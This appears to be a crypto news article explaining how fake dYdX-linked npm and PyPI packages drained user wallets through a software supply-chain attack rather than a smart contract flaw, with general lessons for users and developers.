Wallet Drains via Fake dYdX Packages Show How Crypto Attacks Are Shifting Off-Chain

TL;DR

• A crypto supply chain attack used malicious software packages linked to the dYdX protocol to drain user wallets without exploiting the protocol or its smart contracts.
• Attackers targeted off-chain tooling and dependencies, showing how wallet losses increasingly stem from compromised software rather than on-chain flaws.

Malicious software packages posing as tools linked to dYdX, a decentralized platform for crypto perpetual trading, were recently used to drain user wallets, without exploiting any vulnerability in the protocol itself. The incident reflects a broader pattern. Supply chain attacks are increasingly responsible for user losses across the crypto industry.

Rather than targeting smart contracts, attackers compromised the tools used to access them. This shift has made off-chain crypto attacks a primary risk vector, even as on-chain security improves.

What actually happened

Attackers published malicious npm packages and malicious PyPI packages, presenting them as legitimate tools connected to dYdX. They hosted the packages on public repositories that developers routinely use to download prebuilt software components, much like marketplaces for reusable code.

Once installed, the software acted as wallet draining malware. It quietly collected wallet credentials and enabled unauthorized transfers, often without triggering any visible errors or alerts. Any wallet that interacted with the compromised code had to be considered exposed.

The packages were eventually removed, but anyone who installed them before the removal was already at risk.

This wasn’t a protocol failure

The incident illustrates the difference between on-chain and off-chain crypto attacks. The dYdX protocol continued to operate normally, and the attack did not involve any smart contract vulnerability.

Instead, the compromise occurred entirely in the surrounding software layer. Off-chain crypto attacks exploit trust in developer tools and dependencies, areas that protocol audits do not cover. Hence, protocol security alone is no longer sufficient to prevent losses.

The shift from on-chain exploits to off-chain attacks

As smart contract security has improved, direct on-chain exploits have become more expensive and less reliable. So, attackers now focus on softer targets outside the protocol boundary and move the crypto attacks off-chain.

Dependency poisoning and fake tooling allow attackers to bypass hardened contracts and reach private keys directly, without engaging with blockchain defenses at all.

>>> Read more: ModStealer Malware Uses Fake Job Ads to Target Crypto Wallets

Why crypto is especially vulnerable to supply-chain attacks

Crypto’s software supply chain depends heavily on open-source packages and rapid iteration. Dependencies are often pulled from public repositories with limited verification.

These conditions make developer dependency attacks particularly effective because a single compromised package can expose private keys and trigger immediate losses.

To understand how these crypto supply chain attacks work, one must first recognize that the most fragile components often sit outside the blockchain itself.

What this means for users and developers

The incident underscores how wallet security in crypto now extends beyond phishing scams or flawed smart contracts. Increasingly, what puts funds at risk comes down to whether a user can actually trust the third-party software relied on.

For developers, developer dependency attacks turn routine choices into real risk decisions. Pulling a package, trusting an update, or skipping verification can now carry direct financial consequences.

>>> Related: Cardano Wallet Phishing Uses Fake Eternl Desktop Installer

Conclusion

The dYdX-related package incident helps explain why wallets get drained without smart contract hacks, even when protocols operate as intended. The losses did not stem from a failure of blockchain design, but from assumptions made outside it.

Seen in that light, a supply chain attack is less an anomaly than a byproduct of how crypto software is built and distributed today. Protocol security matures, so attackers increasingly exploit the trust placed in tooling, dependencies, and update paths sitting off-chain.